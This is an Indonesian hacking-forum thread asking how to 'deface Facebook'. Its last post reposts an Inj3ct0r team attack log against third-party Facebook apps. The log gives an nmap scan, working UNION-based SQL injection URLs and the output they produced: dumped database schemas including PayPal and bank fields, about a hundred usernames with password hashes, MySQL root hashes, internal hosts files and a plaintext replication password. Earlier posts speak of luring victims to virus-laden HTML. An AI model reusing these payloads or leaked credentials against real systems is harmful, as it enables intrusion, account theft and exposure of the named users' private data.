D U L U :pusing: :pusing: :pusing: :pusing: :pusing:heripujiantoro wrote:Darkzzzz wrote:Mungkin yg dia mksd Mendeface Akun FaceBook, karena wkt dlu ada aplikasi yg namanya Html Box di Facebook.
Sumber : http://www.readwriteweb.com/archives/to ... tility.phpreadwriteweb wrote: HTML Box is an app that lets you add pretty much anything to your Facebook profile. You still can't get around the no autoplay rule that Facebook has imposed on developers, but with HTML Box you could add almost any photo, video, text, or flash animation/application you can think of. In a way, HTML Box lets anyone have their own custom Facebook app running on their profile (i.e., this is perfect for advertising your website or business via your profile!).
Html Box : http://www.facebook.com/apps/applicatio ... 2387972775
Bos itu cara ngegunainya gmana bos...
soalnya masih awam enyong :devil
Deface Facebook
Moderators: Paman, Xshadow, indounderground, NeOS-01
Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
Re: Deface Facebook
Menjadi seorang manusia yang berguna bagi OrTu adalah impianku
Visit my NewBie Site http://dippo-unix.co.cc
fb : abay dippo unix
Visit my NewBie Site http://dippo-unix.co.cc
fb : abay dippo unix
-
heripujiantoro
- Posts: 10
- Joined: Tue Jun 08, 2010 12:08 pm
Re: Deface Facebook
Please.....tolong dong para Master untuk ngejelasin cara Deface Facebook.
:maaf:
-
Darkzzzz
- Posts: 2206
- Joined: Fri Jul 27, 2007 1:59 pm
- Location: UG-HotZone Depok 4, UG-HotZone Klp2 4 & UG-HotZone WaterFall.
- Contact:
Re: Deface Facebook
Tau sekarang masih ada pa kagak? Coba aja masuk ke LINK nya, sukur2 masih bisa ...
Sukur2 bisa giring mangsa ke Html bervirus
Amiiin ...
Sukur2 bisa giring mangsa ke Html bervirus
Amiiin ...
I'm not A Hacker, But I'm A 
-
heripujiantoro
- Posts: 10
- Joined: Tue Jun 08, 2010 12:08 pm
Re: Deface Facebook
Udah ku coba bosDarkzzzz wrote:Tau sekarang masih ada pa kagak? Coba aja masuk ke LINK nya, sukur2 masih bisa ...
Sukur2 bisa giring mangsa ke Html bervirus
Amiiin ...
Tapi aq ga tau cara selanjutnya
Itu kan semacam kya aplikasi Facebook.
Terus di gimanain lagi bos
-
Nol Sembilan Tiga
- Posts: 141
- Joined: Wed Apr 07, 2010 1:19 pm
- Location: MaNad0
- Contact:
Re: Deface Facebook
ironis emang Facebook bisa di hack? emang bisa ,ya bisa lah.
Ingat ngak ada system yang 100%aman
gw jamin itu,kenapa karena orang di belakang system itulah yang jadi penentunya .Oke kita bahas aja masalah facebook yang kena hack.Bugs nya adalah sql injection (what the hell?) bener deh sumprit,
Kesalahan fb adalah adanya app facebook yang satu host ma facebook server (sayang ndak tahu app facebook yang mana ) lo itu kan app facebook bukan facebooknya ?.Sabar bro pelan pelan tapi pasti,jadi app yang mengandung bugs sql inject tadi sebagai vuln nya so kalo dah tembus app fcebooknya tinggal jumping ke facebooknya.mantep kali kan. dengan sekali klik aja facebook langsung undermaintenan salut buat bro BI4KKOB4R. :love: :love:
Yang bikin salut lagi dia nggak langsung bikin ni facebook down kayak hacker iran (teman-temanya CYBERHELL yang suka reseh kalo ada orang ngintip) yang deface twiter kemarin .Ini adalah bukti bahwa IT indonesia itu nggak kacangan sekelas facebook yang bisa di intip bahkan masuk ke admin lagi.jadi kita harus semangat lagi.
Analisa diatas cuma rekaan dari berbagai sumber yang ada, so bisa aja ada teknik lain.And now Hati -hati ma facebook anda . :devil :devil
Ingat ngak ada system yang 100%aman
gw jamin itu,kenapa karena orang di belakang system itulah yang jadi penentunya .Oke kita bahas aja masalah facebook yang kena hack.Bugs nya adalah sql injection (what the hell?) bener deh sumprit,
Kesalahan fb adalah adanya app facebook yang satu host ma facebook server (sayang ndak tahu app facebook yang mana ) lo itu kan app facebook bukan facebooknya ?.Sabar bro pelan pelan tapi pasti,jadi app yang mengandung bugs sql inject tadi sebagai vuln nya so kalo dah tembus app fcebooknya tinggal jumping ke facebooknya.mantep kali kan. dengan sekali klik aja facebook langsung undermaintenan salut buat bro BI4KKOB4R. :love: :love:
Yang bikin salut lagi dia nggak langsung bikin ni facebook down kayak hacker iran (teman-temanya CYBERHELL yang suka reseh kalo ada orang ngintip) yang deface twiter kemarin .Ini adalah bukti bahwa IT indonesia itu nggak kacangan sekelas facebook yang bisa di intip bahkan masuk ke admin lagi.jadi kita harus semangat lagi.
Analisa diatas cuma rekaan dari berbagai sumber yang ada, so bisa aja ada teknik lain.And now Hati -hati ma facebook anda . :devil :devil
-==Hanya Ingin belajar dan belajar==-
Re: Deface Facebook
COba lihat ini bro...
pi ane g tahu ini beneran pa g. coz ku juga lom tanya lngsung ma yan gbersangkutan...
pi ane g tahu ini beneran pa g. coz ku juga lom tanya lngsung ma yan gbersangkutan...
Code: Select all
=================================================================
FaceBook's servers was hacked by Inj3ct0r team. Hack of the year!
=================================================================
Original: http://inj3ct0r.com/exploits/11638
[+] English translation
Inj3ct0r official website => Inj3ct0r.com
__ __ ___
__ __ /'__`\ /\ \__ /'__`\
/\_\ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __ ___ ___ ___ ___
\/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ /'___\ / __`\ /' __` __`\
\ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ __/\ \__//\ \L\ \/\ \/\ \/\ \
\ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ /\_\ \____\ \____/\ \_\ \_\ \_\
\/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/_/\/____/\/___/ \/_/\/_/\/_/
\ \____/
\/___/
[0x00] [Introduction]
[0x01] [First impressions]
[0x02] [Search for bugs]
[0x03] [Inj3ct0r Crash Exploit]
[0x04] [Conclusion]
[0x05] [Greetz]
If you want to know the Inj3ct0r group, read: http://inj3ct0r.com/exploits/9845
__ __ __
/'__`\ /'__`\ /'__`\
/\ \/\ \ __ _/\ \/\ \/\ \/\ \
\ \ \ \ \/\ \/'\ \ \ \ \ \ \ \ \
\ \ \_\ \/> </\ \ \_\ \ \ \_\ \
\ \____//\_/\_\\ \____/\ \____/
\/___/ \//\/_/ \/___/ \/___/
[Introduction]
+ [En] => In this log file you will read a limited version of the information gathered and provided, since the most important
parts are being kept private in order to be analyzed by the proper authorities and close loopholes in the system.
We did not change the main page, do not sell backup server does not delete files.
We have demonstrated the flaw in the system. Start =] ..
__ __ _
/'__`\ /'__`\ /' \
/\ \/\ \ __ _/\ \/\ \/\_, \
\ \ \ \ \/\ \/'\ \ \ \ \/_/\ \
\ \ \_\ \/> </\ \ \_\ \ \ \ \
\ \____//\_/\_\\ \____/ \ \_\
\/___/ \//\/_/ \/___/ \/_/
[First impressions]
At first glance, FaceBook well protected social network.
Scanning FaceBook server did not give nothing interesting ... )
..>
Initiating Parallel DNS resolution of 1 host.
Completed Parallel DNS resolution of 1 host.
Initiating SYN Stealth Scan
Scanning facebook.com (69.63.181.11) [1000 ports]
Discovered open port 443/tcp on 69.63.181.11
Discovered open port 80/tcp on 69.63.181.11
Completed SYN Stealth Scan 13.16s elapsed (1000 total ports)
Initiating Service scan
Scanning 2 services on facebook.com (69.63.181.11)
Service scan Timing: About 50.00% done; ETC:
Completed Service scan at 22:41, 104.15s elapsed (2 services on 1 host)
NSE: Script scanning 69.63.181.11.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 22:41
Completed NSE at 22:41, 0.38s elapsed
NSE: Script Scanning completed.
Nmap scan report for facebook.com (69.63.181.11)
Host is up (0.17s latency).
Hostname facebook.com resolves to 4 IPs. Only scanned 69.63.181.11
rDNS record for 69.63.181.11: www-10-01-snc2.facebook.com
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION 80/tcp open http 443/tcp open ssl/https
go ahead .. =]
__ __ ___
/'__`\ /'__`\ /'___`\
/\ \/\ \ __ _/\ \/\ \/\_\ /\ \
\ \ \ \ \/\ \/'\ \ \ \ \/_/// /__
\ \ \_\ \/> </\ \ \_\ \ // /_\ \
\ \____//\_/\_\\ \____//\______/
\/___/ \//\/_/ \/___/ \/_____/
[Search for bugs]
We use GoOgle.com
request: Facebook+Vulnerability [search]
We see a lot of different bug / exploits / etc ... Most see only XSS Vulnerabilities
but all this can be found by searching : http://inj3ct0r.com/search
All vulnerabilities are closed (Nothing does not work ... Let us once again to GoOgle.com
request: site:facebook.com WARNING error
=\ amit-amit...
Let us not lose heart) Hackers are not looking for easy ways
Visit Facebook.com
Let us search bugs in Web Apps.
http://www.facebook.com/robots.txt
oooooooooooooooooooooooooooo
User-agent: *
Disallow: /ac.php
Disallow: /ae.php
Disallow: /album.php
Disallow: /ap.php
Disallow: /feeds/
Disallow: /p.php
Disallow: /photo_comments.php
Disallow: /photo_search.php
Disallow: /photos.php
User-agent: Slurp
Disallow: /ac.php
Disallow: /ae.php
Disallow: /album.php
Disallow: /ap.php
Disallow: /feeds/
Disallow: /p.php
Disallow: /photo.php
Disallow: /photo_comments.php
Disallow: /photo_search.php
Disallow: /photos.php
User-agent: msnbot
Disallow: /ac.php
Disallow: /ae.php
Disallow: /album.php
Disallow: /ap.php
Disallow: /feeds/
Disallow: /p.php
Disallow: /photo.php
Disallow: /photo_comments.php
Disallow: /photo_search.php
Disallow: /photos.php
# E-mail [email protected] and [email protected] if you're authorized to access these, but getting denied.
Sitemap: http://www.facebook.com/sitemap.php
00000000000000000000000000000000
nothing interesting =\
http://apps.facebook.com/tvshowchat/
I looked closely, I noticed links
http://apps.facebook.com/tvshowchat/show.php?id=1 habit to check the variable vulnerability...
check:
http://apps.facebook.com/tvshowchat/show.php?id=inj3ct0r
ooooooooooooooooooooooooooo
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 28
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : Space required after the Public Identifier in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : SystemLiteral " or ' expected in /home/tomkincaid
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : Space required after the Public Identifier in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 164
and other....
oooooooooooooooooooooooooooo
O_o opsss! After sitting for a while, I realized that one of the servers is on MySql.
Writing exploits, I got the following:
http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+@@version--+1
ooooooooooooooooooooooooooo
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: </body> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 7: parser error : Opening and ending tag mismatch: body line 3 and html in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: </html> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
5.0.45-log <= ALERT!!!
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123
and other....
oooooooooooooooooooooooooooo
Database : adminclt_testsite
Database User : [email protected]
MySQL Version : 5.0.67-log
super = ] Now, we just can say that there is SQL Injection Vulnerability
http://apps.facebook.com/tvshowchat/show.php?id=[SQL Injection Vulnerability]
Now we know that there is MySql 5.0.45-log
Then let's write another exploit to display tables with information_schema.tables:
http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+count(*)+from+information_schema.tables--+1
oooooooooooooooooooooooooooo
Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: Invalid argument supplied for foreach() in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 38
Warning: imagepng() [function.imagepng]: Unable to open '/home/tomkincaid/tomkincaid.dreamhosters.com/tv/badges/text/ /1 and 1=2 union select count(*) from information_schema.tables-- 1.png' for writing: No such file or directory in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/
201 <= ALERT!!! 201 tables!
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123
and other....
oooooooooooooooooooooooooooo
http://apps.facebook.com/observerfacebook/?p=challenges&id=[SQL INJ3ct0r]
Database : adminclt_testsite
Database User : [email protected]
MySQL Version : 5.0.67-log
1) AdCode
2) AdTrack
3) Admin_DataStore
4) Admin_User
5) Challenges
6) ChallengesCompleted
7) Comments
8) ContactEmails
9) Content
10) ContentImages
11) FeaturedTemplate
12) FeaturedWidgets
13) Feeds
14) FolderLinks
15) Folders
16) ForumTopics
17) Log
18) LogDumps
19) Newswire
20) NotificationMessages
21) Notifications
22) Orders
23) OutboundMessages
24) Photos
25) Prizes
26) RawExtLinks
27) RawSessions
28) SessionLengths
29) Sites
30) Subscriptions
31) SurveyMonkeys
32) SystemStatus
33) Templates
34) User
35) UserBlogs
36) UserCollectives
37) UserInfo
38) UserInvites
39) Videos
40) WeeklyScores
41) Widgets
42) cronJobs
43) fbSessions
Admin_User
1) id
2) name
3) email
4) password
5) userid
6) ncUid
7) level
User
1) userid
2) ncUid
3) name
4) email
5) isAdmin
6) isBlocked
7) votePower
8) remoteStatus
9) isMember
10) isModerator
11) isSponsor
12) isEmailVerified
13) isResearcher
14) acceptRules
15) optInStudy
16) optInEmail
17) optInProfile
18) optInFeed
19) optInSMS
20) dateRegistered
21) eligibility
22) cachedPointTotal
23) cachedPointsEarned
24) cachedPointsEarnedThisWeek
25) cachedPointsEarnedLastWeek
26) cachedStoriesPosted
27) cachedCommentsPosted
28) userLevel
http://apps.facebook.com/ufundraise/fundraise.php?cid=[SQL INJ3CT0R]
Current Database : signalpa_fbmFundRraise
Database User : signalpa_rockaja@localhost
MySQL Version : 5.0.85-community
DATABASE
1) information_schema
2) signalpa_CelebrityPuzzle
3) signalpa_EBF
4) signalpa_appNotification
5) signalpa_appnetwork
6) signalpa_dailyscriptures
7) signalpa_ebayfeed
8) signalpa_fbmFundRraise
9) signalpa_fbmFundRraisebeta
10) signalpa_netcards
11) signalpa_paypal
12) signalpa_thepuzzle
signalpa_fbmFundRraise
1) Campaigns
2) Campaigns_Temp
3) FB_theme
4) IfundDollars
5) Languages
6) Payments
7) Paymentsoops
8) Supporters
9) Users
10) Withdrawals
11) invites
12) invites_copy
13) mp_passwords
14) payment_codes
15) txt_codes
16) valid_servers
17) weeklyBonus
[+] Column: Users
1) id
2) name
3) email
4) mobile_no
5) address
6) country
7) password
8) organisation
9) date_created
10) date_updated
11) status
12) facebook_id
13) isFacebookFan
14) verify
15) paypalUse
16) paypalEmail
17) bacUse
18) bacAcc
19) bacName
20) bacLocation
21) bacCountry
22) bacIBAN
23) bacSort_code
24) current_rank
25) new_rank
26) cronjob
27) max_fundraise
[+] Column: mp_passwords
1) id
2) password
3) username
4) status
5) number
6) rc
7) referer
8) transID
9) currency
10) transType
11) amount
12) confirmed
13) date
signalpa_paypal
1) paypal_cart_info
2) paypal_payment_info
3) paypal_subscription_info
[1] AdrianW: [1] c6553032e2f1bcaf30aa333d0228b783:
[2] Akwala: [2] b0c08027fd0f4deec8515c47125de023:
[3] Aldri: [3] 0366923e9c631e65e30315eff2a14a59:
Column: paypal_cart_info
1) txnid
2) itemname
3) itemnumber
4) os0
5) on0
6) os1
7) on1
8) quantity
9) invoice
10) custom
[+] Column : paypal_payment_info
1) firstname
2) lastname
3) buyer_email
4) street
5) city
6) state
7) zipcode
8) memo
9) itemname
10) itemnumber
11) os0
12) on0
13) os1
14) on1
15) quantity
16) paymentdate
17) paymenttype
18) txnid
19) mc_gross
20) mc_fee
21) paymentstatus
22) pendingreason
23) txntype
24) tax
25) mc_currency
26) reasoncode
27) custom
28) country
29) datecreation
http://apps.facebook.com/tvshowchat/show.php?id=[SQL INJ3CT0R]
Current Database : tv
Database User : [email protected]
MySQL Version : 5.0.45-log
[+] DATABASES
1) information_schema
2) astro
3) candukincaid
4) cemeteries
5) churchwpdb
6) countdownapp
7) crush
8) dare
9) friendiq
10) giants
11) hookup
12) jauntlet
13) loccus
14) luciacanduwp
15) maps
16) martisor
17) mediax
18) mostlikely
19) music
20) pimpfriends
21) plans
22) politicsapp
23) postergifts
24) posters2
25) projectbasecamp
26) pwnfriends
27) quiz
28) seeall
29) send
30) supporter
31) swapu
32) tomsapps
33) travelbug
[+] tab.send
1) app
2) item
3) itemforuser
4) neverblue
5) user
[+] Columns
user(12454)
1) userid
2) siteid
3) appkey
4) session
5) points
6) added
7) removed
Tab. candukincaid
1) wp_comments
2) wp_links
3) wp_options
4) wp_post****
5) wp_posts
6) wp_px_albumPhotos
7) wp_px_albums
8) wp_px_galleries
9) wp_px_photos
10) wp_px_plugins
11) wp_term_relationships
12) wp_term_taxonomy
13) wp_terms
14) wp_user****
15) wp_users
[+]Column wp_users
1) ID
2) user_login
3) user_pass
4) user_nicename
5) user_email
6) user_url
7) user_registered
8) user_activation_key
9) user_status
10) display_name
etc...
http://apps.facebook.com/fluff/fluffbook.php?id=[SQL Inj3ct0r]
> ~ inj3ct0r_facebook_exploit [ENTER]
root:*368C08021F7260A991A9D8121B7D7808C99BBB8A
slave_user:*38E277D5CA4EAA7E9A73F8EF80813D7B5859E407
muu:*74A45B921A1A918B18AE9B137396E5A67E006262
monitor:*1840AE2C95804EC69321D1EE33AADFA249817034
maatkit:*9FA5157314A2CF7448A34DA070B5D44E977A1220
http://apps.facebook.com/snowago/area.php?areaid=[SQL Inj3ct0r]
Database: affinispac_fb
User: affinispac_fb@localhost
Version: 5.0.67-community
http://www.chinesezodiachoroscope.com/facebook/index1.php?user_id=[SQL Inj3ct0r]
>plucky@localhost : facebook : 4.0.13-log
etc... =]
Next xD
Database: thetvdb
User: thetvdb@localhost
Version: 5.0.51a-24-log
[Database]: thetvdb
[Table]
[1]aka_seriesname
[2]apiusers
[3]banners
[4]deletions
[5]genres
[6]imgstatus
[7]languages
[8]mirrors
[9]networks
[10]ratings
[11]runtimes
[12]seriesactors
[13]seriesupdates
[14]translation_episodename
[15]translation_episodeoverview
[16]translation_labels
[17]translation_seriesname
[18]translation_seriesoverview
[19]tvepisodes
[20]tvseasons
[21]tvseries
[22]user_episodes
[23]users
users:
id,username,userpass,emailaddress,ipaddress,userlevel,languageid,favorites,
favorites_displaymode,bannerlimit,banneragreement,active,uniqueid,
lastupdatedby_admin,mirrorupdate
[userpass]
[1] *E92C1AB432D14ACA4D6618A9DFC22810363B114E:
[2] *C62726955C4492A6A0CB7319C3928DACEAC4C66D:
[3] *887C5DA43E5ACEE73689956A4497C0EDA956E790:
[4] *57D6D9BF9F1962C9A006BB451FAF21693624391E:
[5] *51121B1DC695FF11A3AEF514AAA0C487611FD98B:
[6] 3d801aa532c1cec3ee82d87a99fdf63f
[Database]: wiki
[Table]
[24]archive
[25]categorylinks
[26]externallinks
[27]filearchive
[28]hitcounter
[29]image
[30]imagelinks
[31]interwiki
[32]ipblocks
[33]job
[34]langlinks
[35]logging
[36]math
[37]objectcache
[38]oldimage
[39]page
[40]page_restrictions
[41]pagelinks
[42]querycache
[43]querycache_info
[44]querycachetwo
[45]recentchanges
[46]redirect
[47]revision
[48]searchindex
[49]site_stats
[50]templatelinks
[51]text
[52]trackbacks
[53]transcache
[54]user
[55]user_groups
[56]user_newtalk
[57]watchlist
user:
user_id,user_name,user_real_name,user_password,user_newpassword,user_newpass_time,
user_email,user_options,user_touched,user_token,user_email_authenticated,user_email_token,
user_email_token_expires,user_registration,user_editcount
['user_name'] : ['user_pass']
[1] AdrianW: [1] c6553032e2f1bcaf30aa333d0228b783:
[2] Akwala: [2] b0c08027fd0f4deec8515c47125de023:
[3] Aldri: [3] 0366923e9c631e65e30315eff2a14a59:
[4] AleX: [4] afbb46ebf8c46bfb1f286df87d577f87:
[5] Arucard: [5] e94f2b46cbfc681d2346424d7e0e3b3f:
[6] AxesDenyd: [6] a998f782d92a8af1c683e6a0e36404e4:
[7] Badubo: [7] 5a8920177dbf9abddefe4ff49ebbc67c:
[8] Bjarkimg: [8] fd6a9eef25ead144df9592087bb4aec5:
[9] BrandonB1218: [9] 62cda59cc492df4f1b1dd4d1365b5ff5:
[10] Bsudbury: [10] 827d07956629c37855f3518374821872:
[11] Burchard: [11] 4dc05fcbbf5850d27e627d5c4278c4cf:
[12] Carla: [12] f41991b4dfd3b494c39751225e1faa29:
[13] Click170: [13] 9c38b5f4673372a806f38a4dade456cc:
[14] Coco: [14] f6770367b7ca8261a25ea797c24761aa:
[15] Corte: [15] 9add39f338de37ce1cf52eaed38b09b2:
[16] Crippler: [16] b3d947a82648b2707130f176204cbbfd:
[17] Dbkungfu: [17] 0bcb65441f47097f85af79c793c74b95:
[18] Deuce911: [18] 0220c76e24b82236675500f1e536a4be:
[19] DigitallyBorn: [19] 3e57b721280c35ba66f2a151e19c620b:
[20] Divervan10: [20] 1ad65386e69de0896f49c7d0fbaa0cba:
[21] Donovan: [21] 03e4e11728c5f16fc936cb4c1d803029:
[22] Drkshenronx: [22] ea0b8397ad79d255195780e367ccf026:
[23] Emigrating12: [23] c45db536613d53252d00be3dc81cbde0:
[24] Emphatic: [24] 3195961b90ea2fe0ac6d12efac8fef19:
[25] Eta: [25] f083e5e3fd924342f77e4111df8788e1:
[26] Farrism: [26] efef4efa85d73ca0247052687ca9683b:
[27] Fiven: [27] 5f6dd4fde7d37c19d1e267618f55d35f:
[28] FloVi: [28] 918f77c2a0fe807b3cff8816b8aed8ee:
[29] Fritigern: [29] 6a16028b432de68363a20912c31bca03:
[30] Furby: [30] 117088a3b9b504ce23c7926c8691fced:
[31] Gerph: [31] 294d0c1541c7d892962cb51d540753c1:
[32] Hallvar: [32] 4a5da5086b99a7d2f8aef976d364d07c:
[33] Happyfrog: [33] 189a598dbdf27734a47c4731c099712d:
[34] Hjeffrey: [34] 9b6daf5130c8c1a329a1e6ceff31d448:
[35] Hsvjez: [35] fef14c536557ec3b0727246e6f57fadb:
[36] Jase81: [36] 9e4c45874be6735b6432e5f060660a46:
[37] Jcnetdev: [37] 88a2dc251c777d48189501a79e3d3ffa:
[38] Jcpmcdonald: [38] 083968e4c21e6f3ff47c3fefad7c3ff7:
[39] Jobba: [39] 699cb250cc53224bf0220d4c8f513a27:
[40] Jschek: [40] 9bcf4c5f58764dc4c812b78276d5e412:
[41] Juliani1024: [41] c5ea2a208e8e24bd0e3696be6de3bd07:
[42] Kakosi: [42] b747252b62d95163a083acf54141bfc6:
[43] KelleyCook: [43] b929c4422b9ea29845d1bf46fde7e765:
[44] Ken brueck: [44] 1fd5e065ac6587cf351dee24f79def76:
[45] Kennykixx: [45] 2a4a9abc742f3508fa37f37e30ed480b:
[46] Kermtfrg: [46] cbaef6f6fa9175d419af3395f25bd814:
[47] Keydon: [47] e9e984ed67c7e8a67f3406c5506293ec:
[48] Kraigspear: [48] ac70640d36b6c9a3fcff3f66687fd3d5:
[49] Krisg1984: [49] c78ea770e941c369aa3463c9a74d2f1d:
[50] Leecole: [50] 4b3b865528e582b6a4dfc9430aec1ea8:
[51] Livemac: [51] 0e36e0b0866b8911216c464fe8440319:
[52] Markscore: [52] 5710cbdd3de7e28c7c93eb8e48e266a9:
[53] Mcmanuss8: [53] 6262c8e4c7a5bb9d49743c5659d3cc40:
[54] Mcoit: [54] 980a1ea1d9fd960208d004fe7ce928fb:
[55] Mhale62: [55] df318f477b0c4a3e4f9f3e1ced62f607:
[56] Mjh ca: [56] 07223e31ea0a8a617934081475d9ad52:
[57] Mreuring: [57] 42472c97f021f725cea7670b078795a1:
[58] Nathanlburns: [58] b7e16c89320be1b9860dcb83a082881a:
[59] Nekocha: [59] 490c01eea35370bca2c78dce7ab633da:
[60] Ngoring: [60] a19430b436a03fdfda8818f8cf486580:
[61] Nighthawk92: [61] e8c8cf0eeaec4841c14ede3bcac7e6bb:
[62] Null dev: [62] 4e744d982a173d0e1439787da27f022c:
[63] Nunovi: [63] 7325e3df990caadddf2423cf96272fed:
[64] Obsidianpanther: [64] 53fd2e06ca60a0640cdc617681ace453:
[65] PLUCKYHD: [65] 2ac1aa8f8e5341788c9ca7555cc10714:
[66] Plambert: [66] 9333604b2eefdcc01debb843373ae492:
[67] Polargeek: [67] d0394680e24f75e7dae4e0ca23756161:
[68] QyleCoop: [68] af49b70536b2ec2439095947bab36b43:
[69] Ramsay: [69] 317192baea92e857e27c96e80c9f6874:
[70] Scrooge666: [70] 8498d4d9c8de0300f0b8b3bc789d6731:
[71] SeaLawyer: [71] 14dd3e79c6f486319e39ef694cd61a2d:
[72] Searlea: [72] 058beaa0d231d457136015119da5aa34:
[73] Serberus: [73] ff80d6419f6be5d76dd404fdb256eb3c:
[74] Skillzzz: [74] 5f012a10f4eeddacfd2c495f64dbd975:
[75] Smakkie: [75] 7143a09106678ec593eec82fcf3e66fd:
[76] Smoko: [76] d9a1360bfcdedb3c6f48a37442d58dd8:
[77] Smuto: [77] 20ec74ff3d72d42f7593002b0d28a540:
[78] Stdly: [78] 4d7b92f616ffe6b420180e859bf245ba:
[79] Swiip: [79] 120cc4e935a2c57763709392c5eb6fdf:
[80] Szsori: [80] e7fb98c3d405dcc89314996b9c5c6cb2:
[81] THe-BiNk: [81] 49e6e431cccf6a77bf6dafa0c96a361a:
[82] TheStapler: [82] 7278b0168b8cfb38e64d2b6abe6991fc:
[83] Todu: [83] 2173ff53b1fb2bbe3fd49d3d17b6f09f:
[84] TommyD: [84] ca62c603dffc337b87a662fa904caa51:
[85] TrocdRonel: [85] 318698c02f2f6ea7fef38e17cdaa1ac5:
[86] Trol1234: [86] ce07cb60f64f2119a657a1427edc359e:
[87] Trolik123456: [87] d392ceb168469aca3b21e1aaeb00f301:
[88] Trolik23512: [88] dd16749110a800511459fa4ed655b36c:
[89] Trololo23512: [89] 3d508eed899c625389167d2216fae370:
[90] Weaverslodge: [90] c2c22a2c65b487915911c1d7f66b85e8:
[91] Woodstock123: [91] ba4d45f8c7e9574dd839993a2001d5cd:
[92] Wwarby: [92] 04409a510d208e737fa00cd97c712740:
[93] Yabba: [93] 4b1febeed49cd185a8efbb8a61f68d74:
[94] Zombiigraet33456904: [94] 028785be8488292e8b88137b5fd2c128:
[95] Zombiigraet33456906: [95] 4820e4653d77bb3ccab9e7ed25155a5b:
[96] Zubbizub1212: [96] ea2e5c44c48ce8f880a0f1627e599868:
---------------------------------------------------------------------------------------------------------------------------------------------------
read /etc/hosts
127.0.0.1 localhost localhost.localdomain
192.168.1.167 140696-db2.flufffriends.com 140696-db2
192.168.1.166 140695-db1.flufffriends.com 140695-db1
192.168.1.165 140694-web2.flufffriends.com 140694-web2
192.168.1.164 140693-web1.flufffriends.com 140693-web1
69.63.176.141 api.facebook.com
208.116.17.80 peanutlabs.com
----------------------------------
/etc/my.cnf
#SERVER 5 IS THE MASTER FOR DB1 AND ROMIS FOR DB1
log-bin=/var/lib/mysqllogs/bin-log
binlog-do-db=fluff2
expire-logs-days=14
server-id = 5
#master-host=69.63.176.141
#master-user=romis_user
#master-password=romis0123
#master-connect-retry=60
replicate-do-db=miserman
#log-slave-updates
expire_logs_days = 14
I think we found a sufficient number of vulnerabilities!
---------------------------
__ __ __
/'__`\ /'__`\ /'__`\
/\ \/\ \ __ _/\ \/\ \/\_\L\ \
\ \ \ \ \/\ \/'\ \ \ \ \/_/_\_<_
\ \ \_\ \/> </\ \ \_\ \/\ \L\ \
\ \____//\_/\_\\ \____/\ \____/
\/___/ \//\/_/ \/___/ \/___/
[Inj3ct0r Crash Exploit]
So .. Moving on to the fun friends
To avoid Vandal effects of script-kidds I will not give you a link to shell.php, but I enclose you images and some interesting queries =]
..> Inj3ct0rExploit start . + . + . + . + . + . + .
wp_posts
post_password
wp_users
user_pass
done.....
WordPress! oO one of the modules installed in facebook is Wordpress!
check link: http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+count(*)+from+candukincaid.wp_users--+1
oooooooooooooooooooooooooooo
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: </body> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
